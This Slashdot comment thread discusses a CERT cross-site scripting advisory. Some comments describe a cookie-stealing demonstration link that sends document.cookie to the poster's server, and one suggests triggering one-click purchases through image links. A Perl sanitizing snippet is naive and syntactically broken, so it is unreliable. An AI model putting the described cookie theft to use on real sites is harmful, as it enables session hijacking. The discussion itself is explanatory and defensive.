      even the one's that don't do a ton of stuff on the client side have nice "mouseovers" to allow friendly messages for the user at the bottom of the screen.

      This is your idea of a "key feature"?! Look, if the web needs menus, that's fine. But running scripts on the client side isn't the right way to add that feature. Anybody with half a brain could do a lot better.

      Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely.

      Bullshit.

      Doing things this way just draws attention to a problem that can be solved inside of the engineering circle and without bugging the consumer.

      The engineering circle has had years to do something about this crap. They didn't. Browser makers could have shipping their browsers with all client-side execution "features" disabled by default, all along. They didn't. They could have put up a warning popup that tries to scare the user whenever they turn on this stuff. They didn't. Who are you calling irresponsible?


      ---
      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  354. Re:Interesting and valid security hole by dbm00 · · Score: 3

    The only way we can reliably fix this hole is for all of us running servers to remove trust of clients -- we can't depend on clients to disable scripting or cookies.

    And that is really the key. Not only can we not depend on them to disable scripting and cookies, we SHOULD NOT depend on them to do so... It makes all the "good guys" lives that much more difficult when they can't take advantage of the neat technologies available to users just because there are those out there abusing them.

    IMHO, most of this problem could be solved by having smarter browsers. Granted, it is a difficult problem, but what is this about ActiveX controls allowing you to reformat a hard drive!? That is utterly ridiculous. I can't believe that any browser manufacturer would even consider allowing this kind of access to the underlying OS (and I actually _like_ IE).

    My proposal:


    1) Make it a no-brainer for the consumer... Don't bother them at all unless there is a genuine crisis. Exploitable security holes are only genuinely a crisis if they do something worse than crash a machine-- which happens a lot anyways to those of us who aren't running "real" operating systems.

    2) Make it almost a no-brainer for the developer. I should have to think about invalid input from the user, definitely. But I shouldn't have to worry about buffer overrun errors and the like... The subsystems I develop on should be robust.

    3) Make it the browser developer's job to keep the system safe from the Web. The browser is our "window" into the web. Thus, IT should filter the nasties that might come in...

  355. XML will probably make this worse. by Animats · · Score: 3
    Check out the "digital wallet" system being promoted by ECML.org. This is a system intended to make it very easy for a merchant to obtain credit card and address information from your "digital wallet". You're supposed to have to click on something, but it's not clear if that mechanism can be subverted by script-based attacks.

    On a related note, the "digital wallet" mechanism doesn't generate enough data to log the transaction properly at the consumer end. Despite the fact that XML was designed to do exactly that sort of thing, the "digital wallet" system is one-way. You don't get the equivalent of a credit card receipt in XML for your transaction. The way this ought to work is that your wallet is sent an XML invoice and if the user accepts it, a signed XML purchase order with payment info and amount being paid is returned, after which a signed XML purchase information confirmation should come back, get checked against the payment info sent, and get logged into the wallet. That would provide proper accounting controls for the consumer, like physical credit card receipts. But no, that's not how it works. It just sends your credit card info somewhere when you click.

  356. Re:Promiscuous Browsing by takemiya · · Score: 3

    Remember, when you browse someone's site, you browse every site that person has browsed...

  357. Equivalent Advisory circa 1998 by I)ruid · · Score: 3

    This is not a new discovery, in fact, we released an advisory about it in December of 1998. The advisory can be found here: http://www.caughq.org/files/pub/A dvisories/000005. This advisory was sent at the time of release to Yahoo, who promptly fixed their search engine, and was also sent to the BugTraq mailing list where it was promptly denied posting because "This isn't a hack." This has been around for quite a long time, I guess it just takes a CERT advisory to make people take notice.
    NOTE: This is a duplicate post, the original was posted in reply to the wrong post

  358. Am I missing something? by pridkett · · Score: 4

    Am I the only one who said "well, geez, that's obvious, a monkey could have figured that out". The issue is just people being smart about how they handle user provided input. We've all seen this sort of stuff for a long time, so it surprises me that CERT would issue a warning on something like this.

    Just don't be a bonehead when writing your stuff. Strip out all tags then apply them again later if needed.

    $_ =~ s/</&lt;/g;
    $_ =~ s/>/&gt;/g
    $_ =~ s/&lt;\s*\/?b\s*&gt;/<b>/gi;

    This strips out all HTML tags except for properly formatted <B> and </B> tags.

    Grow a brain. It helps.

    --
    My Slashdot account is old enough to drink...
  359. Re: DO NOT FOLLOW THIS by CodeShark · · Score: 4
    I did the old "view source trick" to see what you actually did. ('Cause I really didn't want to send you my slashdot cookies.)

    I hope you don't mind my explaining what the link would do if someone actually clicked it. This is an absolutely brilliant demonstration of the security hole. The link works like this:

    1. the standard <A HREF= "" opening, followed by
    2. an http...slashdot page which I assume is bogus.
    3. Without closing the HREF, Mark then included a <script> tag, with the
    4. location set to his server's printenv as the target, and the
    5. document.cookie (for /.) as part of the contents of the http request header which this script would send.
    6. Then he closed the script tag, (</SCRIPT>) then the HREF.
    Absolutely brilliant. Like he said: DO NOT FOLLOW THIS LINK
    --
    ...Open Source isn't the only answer -- but it's almost always a better value than the alternatives...
  360. We shoulda bought the kid a tricycle (!) by Plasmic · · Score: 4
    Sun Microsystems' has posted their recommendations for Java Web Server .

    Apache has also put up an advisory of sorts, CSS Cross Site Scripting Info. They make several valid points; this is my favorite:

    It is not an Apache problem. It is not a Microsoft problem. It is not a Netscape problem. In fact, it isn't even a problem that can be clearly defined to be a server problem or a client problem. It is an issue that is truly cross platform and is the result of unforeseen and unexpected interactions between various components of a set of interconnected complex systems.
    CERT has a collection of helpful stuff up about Understanding Malicious Content Mitigation for Web Developers.

    (Disclaimer: This post is guaranteed to be free of malicious HTML tags embedded in client web requests by the author)
  361. Script to edit Netscape binary, remove J.Script by devphil · · Score: 4

    Eli the Bearded posted a perl script to alt.hackers recently that edits the Netscape binary and disables certain Javascript "features".

    If you don't read alt.hackers or have no idea what a really cool hack that is, then fire up whatever browser the Linux Lemmings are using this week and go to DejaNews. (I don't recall whether his article has an X-No-Archive header in it or not, YMMV.)

    --
    You cannot apply a technological solution to a sociological problem. (Edwards' Law)
  362. Promiscuous Browsing by gnarphlager · · Score: 4

    DAMNIT. Netscape caught me out with that Opera floozy again. Let alone Mozilla . . . that's like doinking your partner's sibling!!!! And who KNOWS what sort of disease I'll pick up with IE . . . . .

    --

    Bad things often happen to good people,
    It is up to them to see that they remain good.
  363. vote for this in mozilla by gwalla · · Score: 4

    I added a request for this in bugzilla. It is Bug #26272. If you have some spare browser-component votes, vote for it. If you don't have a (free) bugzilla account yet, get one.


    ---
    --
    Oper on the Nightstar
  364. this will steal your slashdot cookies by Marc+Slemko · · Score: 5

    Do not follow this link. Warning: it will send any slashdot cookies that you have (ie. if you are logged in) to my web server, where they will be logged in the logs. The cookies will appear as the query string for printenv. No one else has access to the machine and I will not do anything with them, but can you trust me? But, if you are confident it can't be done, you have nothing to worry about. Javascript has to be enabled for this to work. Most of the people dismissing this problem don't realize the implications. (the link should come out properly, at least it previews right, but getting the right chars in there can be tricky sometimes...) DO NOT FOLLOW THIS

  365. Pointing fingers at the wrong people. by Ex+Machina · · Score: 5

    I think that CERT is pointing fingers at the wrong people here. Relying on the site provider to filter hostile code from messages is naive and foolish. If a website can execute hostile code, someone WILL make a website to do it anyway.
    Browsers should not execute harmful code in the first place. Any code beyond trivial JavaScript needs to be cryptographically signed and then verified before being executed. Clients should warn if the code has not been signed with the certificate of the document owner (provided through a metatag [ yes i know this doesn't verify the document owner's identity ] ) itself. Pages should have the option of passing a metatag like "DisAllowTags 'IMG FONT SCRIPT EMBED'" to keep clients from attempting to parse certain tags and possibly execute code.

    Although I have placed most of the blame on the browser, let me say that the client should not be the only line of defense. Servers that allow posting of external HTML should certainly filter images and scripted content.

    I did like CERT's points about SSL and cookie poisoning. Has anyone generated proof of concept code or heard of this being exploited?

    That's my $0.02. I'd like to hear opinions on providing

  366. Put whatever controls you want into Mozilla by SurfsUp · · Score: 5
    Desperately needed JavaScript options are:
    -no pop-ups (display pop-up requests in a dedicated widget)
    -no clickless redirection (display as links in a pseudo-frame or with a dedicated widget)
    I'd like to point out once again (sorry if I sound like a broken record, but a lot of people seem to forget this) you don't have to ask for such options: you can get and hack your own private copy of Mozilla. When you've prefected the ultimate Javascript security patch, contribute it to the tree.
    --
    Life's a bitch but somebody's gotta do it.
  367. Interesting and valid security hole by NMerriam · · Score: 5

    This one really took me by surprise as a web developer. I have to admit that it had never occurred to me not to trust the client in this manner (although there's nothing on any of my sites that would be capable of being abused in this way).

    But considering the number of dynamic sites that are being thrown up on a regular basis, especially with folks adding messageboards as quickly as possible in hopes of building a "community", i suspect this failure is present on a lot of large sites.

    For those who aren't reading the advisory, it essentially says that sending a malicious link (a link that puts code in the input strings) to someone could cause a server to return that malicious code, assuming that the client sent it knowingly.

    Needless to say, a lot of folks who don't pay attention to status bars and address bars could fall prey to all sorts of exploits based on this that don't require "running" anything on the client machine that a typical security app could catch. The only way we can reliably fix this hole is for all of us running servers to remove trust of clients -- we can't depend on clients to disable scripting or cookies.

    --
    Recursive: Adj. See Recursive.
  368. Works in Slashdot by Webmonger · · Score: 5

    Sure, you can run arbitrary Javascript if you use links. Here's a (safe) example.

    1. Re:Works in Slashdot by seligman · · Score: 5
      Here's a cute example for those of you logged in right now (Not sure this will work in every browser, it should). It doesn't actually do anything, but it would be trivial to redirect you to another page, and log the information.

      Even though I kind find it useful, I think running a script like this should at least be an option in the browser.

      --
      -- It is too late for the pebbles to vote, the avalanche has already started.
  369. What a stupid problem! by TheDullBlade · · Score: 5

    Browsers should never have been made to have only one JavaScript option: on or off.

    You ought to be able to limit your JavaScript functionality in many different ways. I browse with JavaScript off all the time, to prevent automatic pop-ups, but I have to turn it back on because so many sites just don't work with JavaScript turned off (often for no good reason: JavaScript links instead of HTML links, for example).

    Desperately needed JavaScript options are:
    -no pop-ups (display pop-up requests in a dedicated widget)
    -no clickless redirection (display as links in a pseudo-frame or with a dedicated widget)

    With these, I could happily browse all sites with the same settings.

    I can't think of any others yet (I think they depend on the specific environment; aren't there some real security hazards?), but I'm sure there are more. What am I missing?

    (aside from JavaScript, turning off all animations is another much-needed option)

    --
    /.
  370. Does Amazons "one click shopping" fall under this? by IIH · · Score: 5

    When "one-click" shopping from Amazon came out, I was concerned because of the security aspects, and this warning seems to cover one of the possible ways that it could be abused. AFAIK, when at amazon, if you have OneClickShopping turned on, it sends the cookie when you click on a url and you buy the product without any further confirmation.

    However, because of the non confirmation aspect, what is to stop someone sending/posting a message which includes a image link to that "buy" url? Unless Amazon have a security check to stop this, it would be the ultimite spam email - everyone who read it would buy your product!

    Can someone confirm/check if there are safeguards (eg referrers) that stop this simple abuse of OneClickShopping?

    --

    --
    Exigo spamos et dona ferentes
  371. attn: coders by Niko. · · Score: 5

    OK folks, now we really need our browsers to have heavy-duty cookie control, IP filtering, and perhaps even some Java, JS and html "smell-checking".

    I for one would like to see antibookmarks. Control-click on a banner, that server is blocked. Surf into a trap website, hit an fkey, add its domain to a killfile.

    Websurfing is supposed to be promiscuous; that's the idea, I thought. (No pr0n jokes, OK?)

    1. Re:attn: coders by gfxguy · · Score: 5
      I love these suggestions - along with:
      • Not allowing anything to "attach" itself to any buttons on my browser. It's MY browser, and if I want to go BACK or FORWARD then I want to go BACK or FORWARD. Who decided someone should be able to override that?

      • Ability to browser spoof - set what your browser tells sites about your system, the browser itself, etc., thereby making idiot sites that ONLY allow Netscape or ONLY allow IE useless.

      • Asking before opening a window - with the option to open the selected URL in the CURRENT window.

      • You can interactively allow cookies - why can't we interactively allow our names or other information to be sent?

      The thing is, I tried the latest Mozilla and it didn't really render properly. Are any of these privacy/security/paranoia options in there? I'll have to check it out in more detail. At least with the source one can add these in themselves.
      ----------
      --
      Stupid sexy Flanders.
  372. Promiscuous Browsing by rellort · · Score: 5

    That's right, you should not engage in promiscuous browsing on sites you hardly know. If you do, you should practice safe surfing and use an HTTProphylactic.

    (Look ma! I can spell "prophylactic"! Can you believe the college man said I was dumb because I couldn't make a Lego robot?)

    --

    -- In the future, everyone will code Perl for 15 minutes. --